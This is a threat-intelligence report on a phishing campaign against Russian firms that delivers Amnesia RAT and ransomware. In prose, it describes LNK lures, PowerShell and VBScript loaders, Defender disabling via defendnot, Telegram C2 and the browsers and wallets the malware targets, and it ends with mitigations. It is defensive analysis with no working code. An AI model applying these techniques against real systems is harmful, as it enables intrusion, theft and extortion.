Executive Summary

A highly sophisticated multi-stage phishing campaign is currently targeting Russian organizations, leveraging advanced social engineering, public cloud infrastructure, and a combination of surveillance and destructive malware. The campaign delivers both the Amnesia RAT and a ransomware variant from the Hakuna Matata family, utilizing a complex infection chain that exploits native Microsoft Windows features rather than software vulnerabilities. Attackers employ business-themed lures, malicious shortcut files, and staged payloads hosted on GitHub and Dropbox. Notably, the campaign disables Microsoft Defender using the defendnot tool, ensuring persistent and stealthy operation. The attack culminates in data exfiltration, system surveillance, and file encryption, with significant impact on targeted organizations’ operations and data integrity.

Threat Actor Profile

While no direct attribution has been established, the campaign’s sophistication, targeting, and operational security suggest a well-resourced threat actor with a deep understanding of Russian business processes and Windows internals. The use of multi-stage payloads, Telegram-based command and control, and the integration of both Amnesia RAT and ransomware indicate a hybrid objective of espionage and financial gain. The campaign shares TTPs with previously observed operations such as Operation DupeHike and Paper Werewolf/GOFFEE, both of which have targeted Russian entities in recent months. The actor demonstrates a preference for abusing legitimate cloud services and messaging APIs to evade detection and maximize operational flexibility.

Technical Analysis of Malware/TTPs

The infection chain begins with spearphishing emails containing compressed archives (.zip or .rar) with Russian-language business lures. These archives contain malicious LNK files, often using double extensions (e.g., Задание_для_бухгалтера_02отдела.txt.lnk) to masquerade as benign documents. Upon execution, the LNK file launches a PowerShell command that downloads a first-stage script from a public GitHub repository (github[.]com/Mafin111/MafinREP111). This loader script executes in a hidden window, opens a decoy document to distract the user, and immediately notifies the attacker via the Telegram Bot API.

After a deliberate 444-second delay, the loader retrieves and executes a heavily obfuscated Visual Basic Script (SCRRC4ryuk.vbe). This script assembles the next payload in memory, checks for administrative privileges, and persistently prompts for UAC elevation if necessary. Once elevated, the script configures Microsoft Defender exclusions for critical directories and disables additional protections using PowerShell. The defendnot tool is then deployed to register a fake antivirus product, causing Microsoft Defender to disable itself entirely.

The malware proceeds to download a .NET-based surveillance module from GitHub, which captures screenshots every 30 seconds and exfiltrates them via Telegram. It also disables Windows administrative and diagnostic tools through registry modifications and hijacks file associations to display ransom messages. The final payloads are then deployed: the Amnesia RAT (delivered as svchost.scr from Dropbox) provides full remote access, data theft, and further malware deployment capabilities, while the ransomware component encrypts a wide range of file types and replaces clipboard cryptocurrency addresses with attacker-controlled wallets. A WinLocker module may also be activated to restrict user interaction post-encryption.

Command and control is maintained primarily through the Telegram Bot API over HTTPS, with large data sets exfiltrated via GoFile. Persistence is achieved through registry modifications and file association hijacking, ensuring the malware remains active across reboots and user sessions.

Exploitation in the Wild

This campaign has been observed targeting Russian corporate entities, with a particular focus on human resources, payroll, and internal administration departments. The attackers exploit the trust inherent in business communications, using authentic-looking documents and filenames to increase the likelihood of user interaction. No software vulnerabilities or CVEs are exploited; the entire attack relies on social engineering and the abuse of legitimate Windows features such as PowerShell, VBScript, and registry manipulation.

Payloads observed in the wild include the Amnesia RAT, a variant of Hakuna Matata ransomware, and a WinLocker module. The campaign is ongoing, with new samples and infrastructure appearing regularly. Related activity has been linked to Operation DupeHike (UNG0902) and Paper Werewolf/GOFFEE, both of which have targeted Russian organizations with similar techniques and objectives.

Victimology and Targeting

The primary victims are Russian corporate entities, especially those in HR, payroll, and internal administration. The attackers demonstrate a nuanced understanding of Russian business workflows, crafting lures that are contextually relevant and likely to bypass initial suspicion. The campaign’s reliance on user interaction and native Windows features makes it broadly effective across all supported and unsupported versions of Microsoft Windows, including Windows 7, 8, 10, 11, and Windows Server editions. Additionally, the malware targets a wide range of applications for credential and data theft, including Chromium-based browsers (Chrome, Edge, Chromium, Brave, Opera, Opera GX, Vivaldi, Yandex), Telegram Desktop, Discord, Steam, and various cryptocurrency wallets such as MetaMask, Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic Wallet, Guarda, and Coinomi.

Mitigation and Countermeasures

Organizations are strongly advised to enable Microsoft Defender Tamper Protection to prevent unauthorized changes to security settings. Continuous monitoring for suspicious PowerShell and registry activity is essential, as is the blocking of known malicious GitHub and Dropbox repositories and Telegram C2 traffic at the network perimeter. User education is critical: staff should be trained to recognize the risks associated with LNK files, double extensions, and unsolicited compressed archives. Regular audits should be conducted to detect unauthorized Defender exclusions and the presence of fake antivirus registrations, such as those created by the defendnot tool. Endpoint detection and response (EDR) solutions should be configured to alert on anomalous process execution, registry changes, and network connections to known malicious infrastructure.

References

• The Hacker News: Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware

• Fortinet FortiGuard Labs: Inside a Multi-Stage Windows Malware Campaign

• Telegram Bot API

• Defendnot tool by es3n1n

• MITRE ATT&CK Techniques

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and business operations. For more information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.